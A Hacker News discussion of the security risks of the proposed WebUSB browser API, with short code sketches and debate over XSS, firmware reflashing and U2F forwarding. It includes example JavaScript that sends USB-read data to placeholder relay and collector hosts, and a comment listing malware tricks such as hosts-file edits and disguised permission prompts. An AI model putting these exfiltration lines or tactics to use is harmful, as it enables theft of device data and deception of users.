> There is no reason whatsoever to allow remote access to USB devices.
Unless you want to connect your local USB device to some VM in the cloud. Which is exactly the use case that came up in discussion with Reilly Grant when we were both at VMware. It comes up surprisingly often as a requested feature, as IT organizations get increasingly lazy/less funded/laid off and don't want to have to install clients or anything on local machines: just pop open a browser, point it at the VM and connect up the device.
Not that I'm advocating for this in any way... I thought it was pretty out there (along with WebMIDI), but hey, why not, the Web Browser is the One True Platform and everyone and their parent company and sister company has nearly quit doing native application development on any OS (as sad as that makes me).
If you want to connect a USB device to the cloud, that's great. All you need is a usb<->socks proxy running on your local machine, tunneling USB traffic to the remote server.
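On Linux, the kernel's usbip tooling already implements exactly this pattern, no browser involved. A rough sketch (the bus ID and server address here are examples):

```sh
# On the machine the device is plugged into:
sudo modprobe usbip_host
sudo usbipd -D                # start the USB/IP daemon
usbip list -l                 # find the device's bus ID
sudo usbip bind -b 1-1.2      # export that device over the network

# On the remote machine (e.g. the cloud VM):
sudo modprobe vhci-hcd
sudo usbip attach -r 192.0.2.10 -b 1-1.2   # device now shows up as local USB
```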
Why should we build this functionality into the browser? Is it really that much more convenient than installing an app to run the proxy?
The use case you describe is sufficiently rare that, if you need it, downloading an app should not be a high cost to pay. If only 1% of browser users need this USB proxy, why expose an additional attack surface for the 99% who do not need it?
I'm thinking of HTML5 media tags. There's a standard way to specify that something is a piece of media to play, but the browser needs to also have the right codec for that media.
There could be something similar for USB, where there might not even be any "codecs" (drivers) included by default in browsers, but where there's a defined method of making USB devices available.
You'd still have to install a plugin for each device type that your browser doesn't natively understand, but standardizing how to make specific device types available to the browser would be much simpler. And there could be "rewriting proxy" drivers available for improved security, which limit what requests are possible, preventing most hardware exploits.
Although this might still be too much work for little gain.
If you need to install a plugin, why not install an app? Presumably plugins will need to be written for each different browser, just as apps need to be written for each different OS. So there would be very little gain.
> Why should we build this functionality into the browser? Is it really that much more convenient than installing an app to run the proxy?
Apparently it is, given how highly requested of a feature it is to have everything you could do with VMRC available through the web browser with no plugins or local software.
Again, I still don't think it's a good idea either, but I also don't like a lot of the crazy shit built into modern web browsers for maybe 1% of users, like the aforementioned WebMIDI.
Even if you want to remotely attach a USB device, doing it through the browser is a severely silly way to do it.
Why not attach USB devices over IRC? Or SAMBA? Just because it is possible, doesn't mean that it's reasonable or good.
> There is no reason whatsoever to allow remote access to USB devices
Sorta, but that's not what this standard is proposing. It's proposing a way of accessing a USB device from a web browser. There isn't any remote access happening here (at least not directly, though with this standard you could theoretically do that).
This is simply so web apps can get closer to native apps in functionality.
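For reference, the flow the draft proposes looks roughly like this (a sketch against the proposed API; the vendor ID is a made-up placeholder, and the device chooser only appears in response to a user gesture):

```js
// Nothing here touches the network; the user has to pick the device from a
// browser-mediated chooser before the page can see it at all.
async function connect() {
  const device = await navigator.usb.requestDevice({
    filters: [{ vendorId: 0x1234 }]  // placeholder vendor ID
  });
  await device.open();               // open a session with the chosen device
  await device.selectConfiguration(1);
  await device.claimInterface(0);    // claim one interface, not the whole bus
  return device;
}
```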
> It's proposing a way of accessing a USB device from a web browser.
> There isn't any remote access
If you don't see the contradiction between these two statements, I don't know how to help you.
Stop thinking of what this is supposed to do; it's the failure cases that are the problem. Good security design involves concepts like compartmentalization and defense-in-depth. Finding a browser exploit shouldn't also grant low-level access to the USB bus.
> This is simply so web apps can get closer to native apps in functionality.
That's a terrible idea. Blurring the lines between a webpage and a native app simply teaches people to treat webpages as if they were a local app, when they should be learning to treat anything from the network as potentially hostile. If you don't have a clean separation between the remote UI and the local UI, you're creating the perfect situation for phishing attacks.
> If you don't see the contradiction between these two statements, I don't know how to help you.
Alternatively, you could be more constructive and try to explain what your position here is because, as I'm reading this standard, I'm not seeing any remote access (it's all client-side). Granted, as I already mentioned, once access is granted you could use something like WebSockets to make it accessible remotely, but that's a very explicit thing a developer or malicious app has to do. Which, granted, is possible, but the user also has to give it access to do such a thing, which is no different than allowing camera access, which already exists in a similar way.
If you want to argue that anything that can be coded to be accessed remotely is outright remote access then...well just about everything is remote access and it kinda loses its meaning.
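To make that concrete, here is roughly what the "very explicit thing" would have to look like (a sketch; assumes `device` was already granted and opened via `navigator.usb.requestDevice`, and the relay URL is a placeholder):

```js
// Nothing is "remote" until the page deliberately ships the data somewhere.
const ws = new WebSocket('wss://relay.example/usb');  // placeholder relay server
async function relay(device) {
  const result = await device.transferIn(1, 64); // read up to 64 bytes from IN endpoint 1
  ws.send(result.data);                          // the explicit exfiltration step
}
```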
> Stop thinking of what this is supposed to do; it's the failure cases that are the problem. Good security design involves concepts like compartmentalization and defense-in-depth. Finding a browser exploit shouldn't also grant low-level access to the USB bus.
This shows me you didn't even read the standard. The standard OUTRIGHT says the same thing as you and outlines how their standard WOULD NOT grant low level access to the USB bus.
So why even bother commenting if you're not even going to read what's in the standard and comment, incorrectly, about it? This isn't really typical on Hacker News.
> I'm not seeing any remote access (it's all client-side)
Anything that can be accessed client-side can be easily uploaded via XmlHttpRequest or whatever people use for that now. This is not a new concept.
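The modern one-liner version of the same point (the URL is a placeholder and `usbData` stands for whatever the page has already read):

```js
// Anything the page can read, it can ship off with a single call.
fetch('https://collector.example/ingest', { method: 'POST', body: usbData });
```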
> Granted, as I already mentioned, once access is granted you could use something like WebSockets to make it accessible remotely, but that's a very explicit thing a developer or malicious app has to do.
Hardly: user data is incredibly valuable, and you can be sure that for many sites, if a page has access to USB info they will upload and track it. Presumably any foreign JS code imported (e.g. Google Analytics) can also access this data and include it in the information it tracks.
> Anything that can be accessed client-side can be easily uploaded via XmlHttpRequest or whatever people use for that now. This is not a new concept.
Correct but this standard is absolutely not "remote access to USB devices" as the parent suggested. If we're going to abstract the meaning of "remote" to anything that can be uploaded by something that can access it then it loses its meaning entirely.
The standard proposes nothing remote from the web to the browser; it's entirely between USB devices and the browser. Saying "allow remote access to USB devices" is entirely misleading, hence my original comment.
> Hardly: user data is incredibly valuable, and you can be sure that for many sites, if a page has access to USB info they will upload and track it. Presumably any foreign JS code imported (e.g. Google Analytics) can also access this data and include it in the information it tracks.
What's the "hardly" for? You and I don't seem to be disagreeing here.
I think perhaps the point that the others in this thread are making should be rephrased: you execute untrusted code in the browser, and giving that untrusted code effectively direct access to the USB peripherals is frightening. If you trust some website with "webUSB permissions", and that website has a cross-site scripting vulnerability, you've given a remote actor the ability to manipulate some USB device(s).
That being said, I'm a little confused about your definition of "remote" access. If I have a Jetty server with a remotely exploitable hole in it, someone who exploits that hole is depending on me running it locally, but I would still consider it a "remote" exploit. In the same vein, someone running a browser that I can compromise purely with code on external websites is still being "remotely exploited." The attack vector requires the client to visit a specific page or click a specific link, but I didn't have to walk up to their computer and insert a USB stick. That's what makes the attack a "remote" attack for me.
> you execute untrusted code in the browser, and giving that untrusted code effectively direct access to the USB peripherals is frightening.
But if you read the linked specification you're not doing that. You're giving them access to an abstraction that is quite limited in what it can do. If you had direct access you could reflash firmware.
> If I have a Jetty server with a remotely exploitable hole in it, someone who exploits that hole is depending on me running it locally, but I would still consider it a "remote" exploit.
Yes of course that's "remote". It requires network connections to access.
> In the same vein, someone running a browser that I can compromise purely with code on external websites is still being "remotely exploited." The attack vector requires the client to visit a specific page or click a specific link, but I didn't have to walk up to their computer and insert a USB stick. That's what makes the attack a "remote" attack for me.
That's not remote at all. That's entirely client based. The client just happens to load some sort of exploit on its own. If it was really remote you could push a script to the client using its network address.
The client functions the same with or without internet connectivity. The jetty server example does not.
Well, I think we'll have to agree to disagree here on terminology!
When a browser gets a malicious advertisement or a user gets hit by a cross-site scripting attack, I consider that a remote exploit. Yes, it required the client to do something (i.e. visit a malicious page), but there are plenty of things which you can do to create that state without much user interaction. If I might ask, what do you call attacks like these?
I agree though that my Jetty example wasn't a good one, I was just making the point that the exploit was still in client code (i.e. something running on the victim's machine).
> If you don't have a clean separation between the remote UI and the local UI, you're creating the perfect situation for phishing attacks.
I don't know what you're imagining my computer works like, but I don't have a separation between local and remote UI. I have a separation between OS and application UI (e.g. the Windows Ctrl+Alt+Del dialogue) but everything else is untrustworthy, local or not. A local app can be executing untrusted logic "sourced from" the internet just as well as a remote app can. To say otherwise is to presume that all updates to all apps on your PC go through a third party that verifies that they never add any remotely-accessible "extension points" that weren't there in previous updates. Obviously, this is not the case, even for the strictest corporate device-management release-engineering program.
It might be a terrible idea, but keep in mind that practically every development platform aside from the web is becoming more and more locked down as time passes (app stores, etc).
Which sucks, obviously, but it's not surprising that there's an attempt to bring the web closer to parity with native, since it seems to be a more tractable problem than stopping what's happening to native platforms.
I am not sure I agree that "browsers generally have a better permission model than desktop apps". Yes, browsers ask the user if they would like to allow, but do desktop apps have rampant XSS vulnerabilities? If you allow a site to use USB, you have to be worried that any XSS vulnerability will compromise your USB devices.
Weirdly enough I was talking a couple of days ago about requiring things like CSP (which would go very far in defeating XSS) for stuff like webcrypto and other sensitive bits of HTML5.
Someone working for one of the major browsers mentioned they'd considered it but decided against it - not sure on the reasons why but if they're reading this they might like to elucidate...
That would be a good first step. It would have to be a subset of CSP: don't allow inline scripts or eval. HTTPS-only is another step I see as very important.
One reason might be that developers would probably just do the minimum possible CSP rather than following the spirit of it. Unlike with HTTPS, a CSP could be created with the exact same security model as no CSP using directives like unsafe-eval.
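For illustration, the difference between a CSP that actually defeats XSS and one that merely exists (an Express-style sketch; the header values are the point, not the framework):

```js
const express = require('express');
const app = express();

app.use((req, res, next) => {
  // Strict: no inline scripts, no eval, scripts only from our own origin.
  res.setHeader('Content-Security-Policy', "default-src 'self'; script-src 'self'");
  // The "minimum possible" version some developers would ship instead is a
  // policy in name only, with the same attack surface as no CSP at all:
  //   script-src * 'unsafe-inline' 'unsafe-eval'
  next();
});
```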
I am not sure what you are getting at. Those don't occur on the web and are not an issue with desktop apps you install. If a desktop app wants to run a bash command, it can do it. It doesn't need to find a bash injection.
There aren't easily exploitable issues like XSS on the desktop. Meaning, if you run a desktop app you generally don't have to worry that some rogue code has been injected into the app, unless the developer's keys are stolen, which is rare.
Exactly. Combine an XSS attack with USB keyboard monitoring and you've got ridiculously powerful password harvesting. That's just one potential attack of many.
That's not at all an accurate framing. I'm not aware of any implementation that plans to allow access to HID devices (keyboard, mouse, etc.) or other device classes that are already handled natively by the browser/OS. Even ignoring security, just think of what a mess the user experience would be if sites could unbind and override native devices.
When - not if - someone finds an implementation bug in either the browser or the USB hardware, we will see exploits far worse than keylogging passwords. The bug could be in any USB device, not just the subset you're thinking about. Do you really want to trust your host-controller, every USB device, and the browser interface to be bug free? Are you sure there are no subtle non-bug interactions between devices? Have you even seen how USB devices are designed?
Limitations like "no HID devices" are how it's supposed to work, which is different from how it will actually work.
Sorry, but I'm at a loss for what you believe you're responding to here. I made a clear, factual statement regarding the handling of bound USB devices for known devices and classes. Specifically, HID and other native device classes that are already bound by the OS should not be exposed to WebUSB -- the reasons for and robustness of that guarantee should be self-evident to anyone moderately familiar with USB in modern OSes.
Now, if you have a specific argument to make against my statement, then please share it. I have direct experience with the subject here, and ideally can provide context to address such arguments or clear up confusion. However, I really don't think it's productive to respond with non sequitur arguments and personal attacks.
The way USB devices work, they can pretend to be something else and still manage to achieve the ulterior goal. There are some very interesting USB devices on the market which look like one thing, pretend to be something else, and actually are anything but.
Mentioning BadUSB very much implies confusion about the threat models at play. That is, the threat model for BadUSB is a malicious device that attacks the host OS, drivers, or applications. Whereas, the threat model for WebUSB is concerned with malicious sites attacking or abusing physical devices attached to the system.
So, the scenario you seem to be implying would require coordination between a malicious WebUSB site and a malicious device. While I can't claim that it would be impossible, it sure seems to approach de minimis if only given the extent of user interactions and preconditions.
So we're limiting based on USB device type, are we? What about USB keyboards with USB ports in them (which are fairly common)? They could be registered as USB hubs. One of the main reasons USB security is so poor is that the barriers between device types are not strictly enforced, which has led to problems in the past (for example, USB device spoofing is trivial to do; you can probably imagine the sort of hijinks you can get up to with that).
Sorry, you seem to have misread my statement. Everything you just listed are devices that the OS already natively binds. I'm not aware of anyone considering WebUSB implementations that would unbind native devices and expose them to the Web. Rather, the device-level risks for WebUSB primarily center around devices/interfaces that are not in well-known classes or otherwise are not natively bound and may expose dangerous interfaces (e.g. security credentials, unsigned firmware flashing, etc.).
Every USB device that the browser has access to will have a driver that the OS uses to expose its functionality. It doesn't matter whether that driver is built into the OS or not, the OS driver would still exist. The only other option is if the browser is managing hardware outside of the control of the OS by running with lower level privileges, but that opens up an even bigger security risk.
You suggested in another comment that you had some prior background in this area, are you involved in the development of this new web API?
> You suggested in another comment that you had some prior background in this area, are you involved in the development of this new web API?
Justin Schuh is a Chrome security engineer and is one of the most knowledgeable people on the planet when it comes to browser security. He knows what he's talking about more than virtually anyone else in this thread.
This is not an argument from authority. You're free to believe that Justin Schuh is a fraud, or a moron, or just plain wrong in this one instance, but when a person who is an expert in a subject makes a statement that is pertinent to that subject, that is merely called "expertise".
This response just doesn't make sense given that modern OSes expose USB through much higher-level device management and communication APIs. Those are the APIs browsers use, and I've already explained that browsers shouldn't unbind and then expose a device that the OS or another native application has already bound. So, I really don't understand what argument you're trying to make here.
How are users supposed to know whether they can trust a desktop app with near-unlimited access to their computer? Generally they don't, but blindly install it anyway because it seems to do something they need.
I just tested this on my phone today - it sees even my damn ambient light, in real time. Why the hell is stuff like this allowed to be seen by default in a browser?
That website is not using specific browser features to find other devices. It is using standard JavaScript networking functions to check for known classes of devices on your internal network.
Might be splitting hairs, but it's not like the browser is providing a direct API to that data.
> The same logic could be applied to local software, which inevitably is also remote in origin.
One big difference is that one chooses to download the software and install it on a computer. In a browser, everything gets downloaded and executed automatically, including scripts. It's just a matter of opening or being redirected to a URL.
For the average user the two concepts are not so different. Most people wouldn't think twice about downloading an executable, just like they wouldn't think twice about clicking a link.
Which is why it's even more dangerous to browse the web with all receptors (features) enabled.
Add preloading of links on pages, and you have yourself a constantly changing environment (the browser) which is controlled by third parties that don't first require a permission dialog.
So, this is much less safe than consciously running an executable you've downloaded.
You have to give it permission to use USB, though. The USB functionality might also be something included in software you downloaded for another purpose, without your knowledge.
> The sensible alternative is to not enable this functionality at all.
Far too many people seem to think the solution to security problems is to ignore security and only consider the features you want.
This is such a bad idea that I'm starting to question the motives behind it. If I wanted to break the security of an important class of software, it would look something like this "standard".
> USB security is a joke
Most hardware security - USB or otherwise - doesn't exist. Local peripherals were never designed with security in mind.
In order for this to be even vaguely secure, every single device that declares support for WebUSB has to refrain from allowing firmware updates over WebUSB despite how incredibly convenient this is, and despite how much of a support nightmare it would be to roll out bugfixes to users without it, and despite them being developed by hardware manufacturers who generally don't give a fuck about security. I can't see this happening. (Allowing remote firmware updates effectively gives full remote code execution on the host PC to the website behind the device, since it can then emulate USB input devices.)
Oh, I don't disagree; I would bet some of those devices will get owned. My only hope is that the manufacturers will set the "origin allowed" field that says what domains may access the devices.
To see all potential security issues, you need to look at the whole tech stack. A single USB device can have multiple drivers, and although only one is active at any given time the decision over which one to use can be influenced by applications.
"A USB configuration defines the capabilities and features of a device, mainly its power capabilities and interfaces. The device can have multiple configurations, but only one is active at a time. The active configuration isn't chosen by the USB driver stack, but might be initiated by an application, a driver, the device driver. The device driver selects an active configuration.
A configuration can have one or more USB interfaces that define the functionality of the device. Typically, there is a one-to-one correlation between a function and an interface. However, certain devices expose multiple interfaces related to one function."
So let's say I want to exploit this new WebUSB API. If I infect your computer with malware that installs a second USB driver for the hardware I want access to, and this second driver has support for WebUSB, I could theoretically control the driver being used by making a WebUSB request for the device, thereby exposing the hardware for further exploits.
This is what Raymond Chen calls "being on the other side of the airtight hatchway". If you can install a USB driver on my machine, it's because you can run native code on my machine, and so you can use that to talk to the USB device without requiring WebUSB.
The difference between using the malware itself to communicate via the web and using WebUSB to do so would be in malware detection. If an unidentified EXE hidden in your Windows partition is communicating via the web that's going to look a lot more suspect than a driver which is trusted by the system. The malware that installed the driver could remove itself after installing the driver, taking out another way to track it down.
An unidentified process talking to the 'net is more suspicious than one installing drivers?
But fine, let's say the malware installs the driver and deletes itself. What then? How are they going to get the browser to navigate to their site, and the user to click the authorization button?
> "But fine, let's say the malware installs the driver and deletes itself. What then? How are they going to get the browser to navigate to their site, and the user to click the authorization button?"
You could do it a number of different ways. For example, it could edit the hosts file (i.e. /etc/hosts) to point a popular website address at an amended site, configure proxy settings in the default web browser, alter the browser shortcut to run a background script on startup that scans for WebUSB-enabled devices, set the driver up to check for updates and disguise the authorisation prompt as a driver-update confirmation, etc...
So this antivirus lets the malware install drivers, edit system files and/or replace shortcuts created by other applications, but not talk to the web, when nowadays almost every program connects to the web to check for updates. Do you know how far-fetched that sounds?
The reality is that if this malware gets enough permissions to install drivers, it can certainly talk to a regular device driver and communicate with the web. It doesn't need WebUSB for anything.
Do you really think attackers will respect that limitation after they overflow a buffer in the browser? You're only looking at how it's supposed to work. What matters is how it will be exploited.
Great, now all my devices can share the bandwidth and reliability characteristics of a stoned boy scout trying to send smoke signals with a flammable blanket!
EDIT: and the less said about pairing difficulties the better.
EDIT2: From the downvotes it seems that many people have had a radically different experience from mine, which is good, because mine has been awful.
HTCOne-Dell: 1MB file will transfer ~50% of the time, pairing took several tries.
HTCOne-MBP: complete no-go, doesn't even pair.
Nexus6-MBP: paired first try, works reliably at a blazing 100kb/s.
Nexus6-Dell: doesn't even pair.
Nexus6-Fitbit: takes minutes to download a day's activity over bluetooth classic, stalls out completely 50% of the time. BLE doesn't seem to work at all.
MBP-Fitbit: requires dongle, synced once, has had 100% failure rate ever since.
Dell-Fitbit: requires dongle, 100% failure rate.
Compare to USB which delivers tens of MB/s in bandwidth with 100% reliability and no pairing process (RIP plug and play). I love the promise of bluetooth, but in my experience it has consistently fallen spectacularly short of that promise in every regard.
APIs to access HSMs exist already, though – PKCS11 and friends. And HSMs are designed to deal with accesses from questionable sources, so if you wanted to improve their accessibility with an HSM-specific standard, it'd be not much of a headache.
All other bazillion USB devices ever made are not designed to deal with security, and exposing them over the internet will blow up spectacularly.
This is just Google trying to reinforce their everything-in-the-cloud-as-web-app model, which they are in a position to do considering they make one of the leading browsers, especially amongst developers.
It's shoehorning everything into ancient technology ill-suited for any of these applications, which is not exclusively Google's fault of course. First HTML was augmented with Javascript, which was augmented with XMLHttpRequest, which led to an increased usage of Javascript (Here's where Google comes in), which led to a lot of manpower being invested in optimizing the Javascript engines (trying to run a quirky dynamic language as fast as possible) and then augmenting the browser with "native" OS features like:
* Full-screen mode
* Clipboard control
* Native notifications, with background workers, etc.
* WebMIDI
* OpenGL
* etc.
Which is basically like building a second operating system on top of the already existing architectures. Google tried to further push people this way by coming up with Chromebooks, which in reality actually serve to reinforce my point, since most (not all!) users find them just not sufficient.
Which didn't surprise seasoned OpenGL developers at all, because it happens to us all the time that we see old memory contents in uninitialized buffer objects.
I wish to be able to browse websites, which contain (a) text, (b) associated images, (c) low forms of interactivity, say, comments, or interactive graphics.
This is pretty much the web 2012, or most of German-language web today still.
For browser games, let’s just use the same paradigm as with apps instead: bundle them via node+webkit, and integrate a "run locally" API into browsers that automatically downloads a program and runs it locally in a sandbox, but separately.
In the long term, for games we’ll need to develop a different concept anyway.
But there’s a good reason why no one develops 3D games in PDF, despite PDF supporting 3D objects, scripting, and modification of the document via scripts.
Allowing access to FIDO U2F devices via this would fundamentally break the security model of U2F. It relies on websites being forced to go through a U2F-specific layer in the browser that ensures websites can only request authentication to that site. Without that, any website could do a forwarding attack where it forwarded the authentication request from any other website to the device and used the response to authenticate as you. In order for this to be used for a second factor, you'd basically have a separate authentication dongle for every website.
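Roughly why that browser-mediated layer matters (a simplified sketch of what a U2F assertion covers; `serverChallenge` is a placeholder for the relying party's nonce):

```js
// The token's signature covers a hash of the origin as attested by the
// *browser*, so an assertion minted for site A verifies only against site A.
const clientData = JSON.stringify({
  typ: 'navigator.id.getAssertion',
  challenge: serverChallenge,  // placeholder: nonce from the relying party
  origin: location.origin,     // filled in by the browser, not by page script
});
// signed data ≈ sha256(appId) || userPresence || counter || sha256(clientData)
// Raw USB access would let a malicious page hand the token an appId hash for
// some *other* site, which is exactly the forwarding attack described above.
```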
Some USB devices can be firmware-flashed over USB. They expose secret commands or additional descriptors for doing this. A popular method is to expose an HID endpoint that is actually used for uploading firmware.
If the implementation allows access to these endpoints in a way that allows them to upload firmware, this is very bad for security.
If you plug your USB device into an unknown computer, or accidentally grant an unknown webpage access to it, it's reasonable to expect that the device could have been reprogrammed. And a reprogrammed USB device may very well expose any descriptor(s) it wants to - HID keyboard, mass storage device, ethernet connection...
Section 2 of the spec names and addresses exactly this concern:
> USB hosts and devices historically trust each other. There are published attacks against USB devices that will accept unsigned firmware updates. These vulnerabilities permit an attacker to gain a foothold in the device and attack the original host or any other host to which they are later connected. For this reason WebUSB does not attempt to provide a mechanism for any web page to connect to arbitrary devices.
...
> For this reason this specification outlines two mechanisms that can be combined by the UA before a site is granted access to a device. First, so that the device can protect itself from malicious sites it can provide a set of origins that are allowed to connect to it. These are similar to the [CORS] mechanism and can conceptually be thought of as treating USB devices as their own origins in the "usb" scheme. For devices manufactured before this specification is adopted information about allowed origins and landing pages can also be provided out of band by being published in a public registry. Second, so that the user's privacy is protected the UA may prompt the user for authorization to allow a site to detect the presence of a device and connect to it.
> USB hosts and devices historically trust each other...
We've seen this exact recipe for years of pain play out again and again. C was designed when programmers wrote code for themselves and other people who weren't trying to break that code; if you manage to overflow a buffer in some command-line utility that uses "gets()", you're basically punching yourself in the face. SMTP was designed to send messages between non-commercial entities who wanted to communicate; then the people who stuffed your mailbox with ads realized they could stuff your internet mailbox with ads almost for free. In both cases, a system built for a trusting environment was used in an untrusting one, and there was much pain.
A public registry and an optional nag about an on-by-default feature won't come close to addressing the problem. With thousands of types of USB devices out there, who will go through and audit them all, and keep the registry up to date? And how many users will see the nag and just do the easiest thing to make it go away, or even have the knowledge to make the decision? It seems like browsers need an "annoying/harmful Web 3.0 features" tab with an ever-growing list of check boxes for WebGL, notifications, geolocation, USB, etc., with all of them set by default to "deny without asking."
This doesn't really fix the problem though.
If WebUSB exists in peoples' browsers, and if a game on a web page asks to connect to your joystick, or some other peripheral, people are going to do it anyway, regardless of the risks.
And plenty of USB devices already exist that will never be maintained by their manufacturers again. There are huge quantities of USB devices in existence where software support is completely limited to the driver CD that comes in the box - those manufacturers don't care about adding their devices to a public registry, or controlling how firmware is updated.
Furthermore, this public registry idea also implies that a USB VID/PID directly correlates with a device. There are USB devices in existence that emulate another USB device in order to utilize built-in drivers (inbox drivers) and maintain compatibility with existing software. There are also different USB devices that use the same VID/PID to identify themselves, because in order to obtain a VID/PID, you have to pay a licensing fee, which is not always feasible to everyone.
If this public registry is used, it may create conflicts.
If the CORS-like public registry entries are always trusted by the browser, it could even create security concerns where remote computers are allowed to seize control of local USB devices.
It would certainly be concerning if USB devices were firmware updated without users' consent, simply by going to the website of the manufacturer. Or even a web advertisement that connects to USB devices...
In the future we may even see some kind of attack on web servers in order to gain access to the USB devices of unsuspecting users...
Fully agree. I don't even see the use cases. For most things that are mentioned in the comments (mostly something like connecting proprietary USB devices to the browser), a native application that proxies the related data to browsers seems like a much better approach. For well-understood device classes that would be used by a bigger number of websites, it makes far more sense to standardize high-level APIs which cover exactly these devices (as happened for webcams and other stuff).
The WebUSB approach also limits each device to be connected and controlled by exactly one browser frame which makes it not very desirable for sensor and other input applications.
> a native application that proxies the related data to browsers seems like a much better approach
Why do you think that? It seems needlessly complex to me when you could just have a simple permission pop up in the web app. What's the benefit of downloading an executable?
And then you get the permission popup each time you open the page? Seems needlessly annoying to me. Or only once? Then most users would have no idea how to revoke the access right. Uninstalling the application they installed for the purpose seems more straightforward.
Besides the permissions stuff, giving a single browser window access to raw USB data also seems technically wrong. There are lots of reasons why we now have drivers instead of applications directly using the hardware like 30 years ago. A driver or dedicated application can allow multiple clients (browser windows) to access the device's functionality; a driver directly embedded in a web page can't. A driver in the webpage also means that once you close that page, the communication state between PC and USB device is left undefined (I can't see a way to automatically do anything meaningful on goaway), so the only thing that could be done is to disconnect and reconnect the device. Some further implications: multiple tabs for your web app are not possible, and even other stuff like Ctrl-R would not work as desired (disconnect device, reconnect device, wait, wait, wait, ...).
There are use cases for things like Arduino (a microcontroller development board). We'd like to allow uploading to Arduino boards from an online IDE. We'd also like to allow for interaction between sensors and actuators on an Arduino board and websites (e.g. programs written in the Scratch visual programming language). Yes, we can do much of this by having the user install a local application that communicates via web sockets, but that has its own security implications and adds an additional step for the user.
Unfortunately the obvious way of doing this with WebUSB is, from a security perspective, equivalent to giving the online IDE the ability to install arbitrary code. The Arduinos with sophisticated enough USB stacks to support WebUSB can also be reprogrammed by sketches to emulate a keyboard and inject keystrokes, including a series of keystrokes that downloads and executes a malicious executable.
> Yes, we can do much of this by having the user install a local application that communicates via web sockets, but that has its own security implications and adds an additional step for the user.
Your target audience is Arduino hackers, and you're worried about them installing an app? You need to seriously reassess your assumptions.
It still doesn't make any sense. Who that's not intimidated by soldering irons and wiring up circuits that can literally burst into flames if you do it wrong is going to say, "Heavens to Betsy! I have to click an installer! My word, I'm comin' down with the vapors!"?
Thanks to all those who are concerned about security aspects of this spec. We must always be asking "what if". But do understand that there is no fundamental difference between installing a 3rd party app on your phone and granting a website access to USB. There is some code, and you are granting it permission to mess with your life. The only difference here is the context, which you will get used to.
Find another way to access that kind of security hardware. That's the kind of thing that should be mediated through a strictly limited API in the browser anyway, where standardized UI can be provided.
Many people have been using two factor authentication for some web pages through SSL, PKCS11 modules and client side certificates on USB cryptokeys or smartcards for ages.
I always find it funny how each new browser and OS release makes it a little more hidden and a bit more convoluted to set it up. All while more and more web developers complain about what a big problem secure authentication on the web is.
That is probably one of the driving forces behind this and similar technologies (NFC and Bluetooth LE integration with the browser). All technologies supported by the 2FA standard FIDO U2F, incidentally.
So yeah, I understand why adding this to a web browser seems unwanted, but as long as the API is well-defined and built with security as its first and primary concern, this could actually improve the overall security of online services significantly by making two-factor authentication something your browser just does, and does right. I can recommend skimming the FIDO U2F spec [1] to anyone with doubts about the applicability and necessity of this standard.
The linked article basically starts with a section on privacy and security concerns though, so that is somewhat reassuring.
All you really need for that is a smartcard and a (USB) card reader to plug it into. Those could be integrated into one USB device also. That is an existing technology which is already deployed and in widespread use.
This spec is one of the most interesting features to come to the web. I can think of at least three ways I can use something like this to deliver interesting experiences to users, which would not otherwise be possible.
Yes, it increases the attack surface. This is a real danger, and should not be taken lightly. But no one is taking it lightly.
Another danger, which I haven't seen mentioned yet, is that it increases your fingerprint. If a website can list the Web USB devices currently connected, that's a way to deanonymize you.
But if you set aside those negative qualities, WebUSB, I think, is one of the more important features on the horizon.
For example, I could build and ship a light sensor. The idea is that you'd connect it to your laptop, and websites would be able to react to your environment's lighting + your current screen brightness. Think dynamic color schemes that always look good no matter what kind of monitor you're using, or whether it's night or day. This is only possible with hardware; no amount of software will make this feature available. And I can't think of any convenient way to do it other than WebUSB.
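As a sketch of how simple the web side could be (everything device-specific here is invented: the vendor ID, the endpoint, and the "one little-endian float of lux per transfer" wire format):

```js
// Hypothetical ambient-light sensor: one 4-byte little-endian float of lux
// per IN transfer on endpoint 1.
async function readLux() {
  const device = await navigator.usb.requestDevice({ filters: [{ vendorId: 0xabcd }] });
  await device.open();
  await device.selectConfiguration(1);
  await device.claimInterface(0);
  const result = await device.transferIn(1, 4);
  return result.data.getFloat32(0, true); // true = little-endian
}
```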
Unfortunately, it looks like their definition of brightness is a floating point number, and that's the only thing their API exposes. Hopefully future versions of the standard will be updated to better match the real world.
What we perceive as brightness is (a) the number of photons of each wavelength that (b) intersect a given point in space and (c) are exiting in a given direction. Obviously, not all of this information can be encoded in digital form. There's simply too much data to encode, let alone measure accurately. But reducing the data to a simple 1D number renders the data almost useless.
No website will be able to achieve good results if the dynamic color scheme is based on a single number.
That's also why the WebUSB spec is exciting. I don't have to wait for this spec to be drafted, or for browsers to support it, or to live with any shortcomings it ships with. I'm free to create.
What kind of physical sensor are you proposing that would give you data like that? I think most ambient light sensors in laptops are just LDRs, which are only capable of giving you a 1D number.
I propose that this is a capital-H Hard Problem, and that new technology is needed to address it. I further propose that this technology exists, but is not yet mainstream. The fact that monitors can be calibrated to great accuracy is proof that the tech exists.
There is an opportunity here, but to understand this space, you have to dive into it. There are some excellent books on the subject of colorimetry, but a quick bootstrapped understanding might look like:
1. Your eyes are designed to fool you.
2. How your eyes fool you is determined entirely by the photons that enter it.
3. Each of these photons has a wavelength. The more of them at a given wavelength, the more your perception shifts.
4. What you perceive as color is a combination of wavelengths. But -- critically -- these combinations affect each other. It is not true to say that the more photons that arrive at a given wavelength, the more intensely you perceive that wavelength. It causes a shift in your perception, but this shift is not necessarily a simple increase in brightness.
These are first principles, and it's a very brief sketch of the problem. But everything else follows from this. What ambient light sensors currently do, how APIs are designed, etc is all secondary. The problem is both as simple and as difficult as outlined above.
Now, you can say that this isn't worth tackling, or that the current systems are good enough, and so on. But you'd be missing out on quite an experience. Seeing the type of results you can get from a perfectly calibrated environment is really mindblowing. And the interesting part is, it's impossible for me to describe these results in text, or by showing you a photo, or a video, for the same reason you can't describe an Oculus experience. You have to be there.
Personally, I find colorimetry one of the most intellectually fun and gratifying areas of science.
I think a sensor that has 3 sub-sensors that respond at roughly the same wavelengths as our cones, and has each sensor's response curve matched to human perception would be good enough, no? Maybe with a clever algorithm to reduce the 3 values to a single perceived brightness value?
I feel like something along those lines must already exist for a number of uses.
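Something along those lines does exist for display-referred values: the usual reduction is a weighted sum such as Rec. 709 relative luminance (a crude stand-in for cone responses, not a real colorimetric transform):

```js
// Rec. 709 relative luminance from linear R, G, B values in [0, 1].
function relativeLuminance(r, g, b) {
  return 0.2126 * r + 0.7152 * g + 0.0722 * b;
}
```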
